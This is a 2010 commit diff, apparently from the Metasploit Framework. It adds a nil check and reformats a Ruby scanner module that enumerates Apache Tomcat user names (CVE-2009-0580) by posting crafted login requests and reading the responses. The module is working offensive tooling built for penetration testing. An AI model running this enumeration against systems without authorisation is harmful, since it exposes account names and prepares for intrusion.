do not access res.code if res is nil, fixes #2184

git-svn-id: file:///home/svn/framework3/trunk@9726 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-07 19:52:05 +00:00 · 2010-07-07 19:52:05 +00:00 · 4705998f6c
parent 2de94b910b
commit 4705998f6c
1 changed files with 29 additions and 21 deletions
--- a/modules/auxiliary/scanner/http/tomcat_enum.rb
+++ b/modules/auxiliary/scanner/http/tomcat_enum.rb
@ -24,25 +24,28 @@ class Metasploit3 < Msf::Auxiliary
 		super(
 			'Name'           => 'Apache Tomcat User Enumeration',
 			'Version'        => '$Revision$',
-			'Description'    => %q{Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40.},
+			'Description'    => %q{
+					Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 
+				6.0.20, 5.5.28, and 4.1.40.
+			},
 			'Author'         =>
-			[
-				'Alligator Security Team',
-				'Heyder Andrade <heyder.andrade[at]gmail.com>',
-				'Leandro Oliveira <leandrofernando[at]gmail.com>'
-			],
-
+				[
+					'Alligator Security Team',
+					'Heyder Andrade <heyder.andrade[at]gmail.com>',
+					'Leandro Oliveira <leandrofernando[at]gmail.com>'
+				],
 			'References'     =>
 				[
 					['BID', '35196'],
 					['CVE', '2009-0580'],
 					['OSVDB', '55055'],
 				],
-				'License'        =>  MSF_LICENSE
+			'License'        =>  MSF_LICENSE
 		)

 		register_options(
-			[ Opt::RPORT(8080),
+			[ 
+				Opt::RPORT(8080),
 				OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
 				OptBool.new('VERBOSE', [ true, "Whether to print output for all attempts", true]),
 				OptString.new('UserAgent', [ false, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible MSIE 6.0; Windows NT 5.1)' ]),
@ -60,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run_host(ip)
 		@users_found = {}

-		each_user_pass {|user,pass|
+		each_user_pass { |user,pass|
 			do_login(user)
 		}

@ -81,25 +84,30 @@ class Metasploit3 < Msf::Auxiliary
 		post_data = "j_username=#{user}&password=%"
 		vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
 		begin
-			res = send_request_cgi({
-				'method'  => 'POST',
-				'uri'     => datastore['URI'],
-				'data'    => post_data,
-			}, 20)
+			res = send_request_cgi(
+				{
+					'method'  => 'POST',
+					'uri'     => datastore['URI'],
+					'data'    => post_data,
+				}, 20)

-			if (res and res.code == 200 and res.headers['Set-Cookie'])
-				vprint_status("#{target_url} - Apache Tomcat #{user} not found ")
-			elsif (res.code == 200)
-				print_good("#{target_url} - Apache Tomcat #{user} found ")
-				@users_found[user] = :reported
+			if res
+				if res.code == 200
+					if res.headers['Set-Cookie']
+						vprint_status("#{target_url} - Apache Tomcat #{user} not found ")
+					else
+						print_good("#{target_url} - Apache Tomcat #{user} found ")
+						@users_found[user] = :reported
+					end
+				end
 			else
 				print_error("#{target_url} - NOT VULNERABLE")
 				return :abort
 			end
+
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 		rescue ::Timeout::Error, ::Errno::EPIPE
 		end
 	end

 end
-